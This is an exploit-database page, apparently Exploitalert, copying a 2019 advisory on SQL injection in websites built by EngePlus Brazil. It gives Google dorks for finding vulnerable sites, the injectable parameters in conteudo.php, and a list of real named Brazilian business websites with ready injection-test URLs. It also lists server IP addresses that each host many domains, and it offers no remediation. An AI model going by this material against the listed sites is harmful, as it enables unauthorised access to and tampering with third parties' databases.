Advertisement






Desenvolvido por EngePlus Brazil SQL Injection

CVE Category Price Severity
CWE-89 Not disclosed High
Author Risk Exploitation Type Date
Engeplus Brazil High Remote 2019-04-17
CVSS EPSS EPSSP
CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019040157

Below is a copy:

Desenvolvido por EngePlus Brazil SQL Injection
####################################################################

# Exploit Title : Desenvolvido por EngePlus Brazil SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 11/04/2019
# Vendor Homepage : engeplus.com.br
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:Desenvolvido por EngePlus site:br
inurl:/conteudo.php?int=noticia site:br
# Vulnerability Type : CWE-89 [ Improper Neutralization of 
Special Elements used in an SQL Command ('SQL Injection') ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

####################################################################

# Impact :
***********
Desenvolvido por EngePlus Brazil is prone to an SQL-injection vulnerability because it 

fails to sufficiently sanitize user-supplied data before using it in an SQL query. 

Exploiting this issue could allow an attacker to compromise the application, 

access or modify data, or exploit latent vulnerabilities in the underlying database.

A remote attacker can send a specially crafted request to the vulnerable application 

and execute arbitrary SQL commands in application`s database.

Further exploitation of this vulnerability may result in unauthorized data manipulation.

An attacker can exploit this issue using a browser or using any SQL Injector Tool.

####################################################################

# SQL Injection Exploit :
**********************
/conteudo.php?int=noticia&codigo_not=[SQL Injection]

/conteudo.php?int=canal&codigo_can=[SQL Injection]

####################################################################

# Example Vulnerable Sites :
************************
[+] rebemil.com.br/conteudo.php?int=noticia&codigo_not=8%27

[+] metalporto.com.br/conteudo.php?int=canal&codigo_can=2%27

[+] brasilcob.com.br/conteudo.php?int=noticia&codigo_not=5%27

[+] espelhoscosmeticos.com.br/conteudo.php?int=noticia&codigo_not=3%27

[+] carroceriasnuernberg.com.br/conteudo.php?int=noticia&codigo_not=1%27

[+] bilharesfera.com.br/conteudo.php?int=noticia&codigo_not=8%27

[+] entec.ind.br/conteudo.php?int=noticia&codigo_not=47%27

Vulnerable IP Address => (179.127.80.14) => There are 1 domains hosted on this server.

Vulnerable IP Address => (179.127.80.7) => There are 82 domains hosted on this server.

Vulnerable IP Address => (179.127.80.5) => There are 199 domains hosted on this server.

####################################################################

# SQL Database Error :
*********************
You have an error in your SQL syntax; check the manual that corresponds to 
your MySQL server version for the right syntax to use near '' at line 1

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

####################################################################

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum